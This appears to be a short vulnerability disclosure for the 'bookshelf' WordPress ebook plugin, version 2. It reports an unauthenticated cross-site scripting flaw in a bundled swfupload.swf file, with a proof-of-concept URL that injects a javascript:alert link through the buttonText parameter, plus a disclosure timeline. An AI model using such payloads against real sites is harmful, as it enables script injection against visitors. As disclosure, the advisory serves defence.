wp-plugin : bookshelf

Plugin Details
Plugin Name: wp-plugin : bookshelf
Effected Version : 2 (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/plugins/bookshelf/includes/js/jquery-asyncUpload-0.1/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E

 

 


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| This plugin allows you to sell ebooks. It works with PayPal and has multiple currency option. This plugin adds a buy now button at the end of the book description. Book description can be written on posts. Simply add **"price"** to the custom value(without quotes) of the post. The price value should be without currency symbol. You can choose curreny option from plugin settings page. For instructions visit http://www.revood.com/blog/using-bookshelf-2-0/ For suggestions and feedback visit http://www.revood.com/blog/bookshelf-2-0/ ]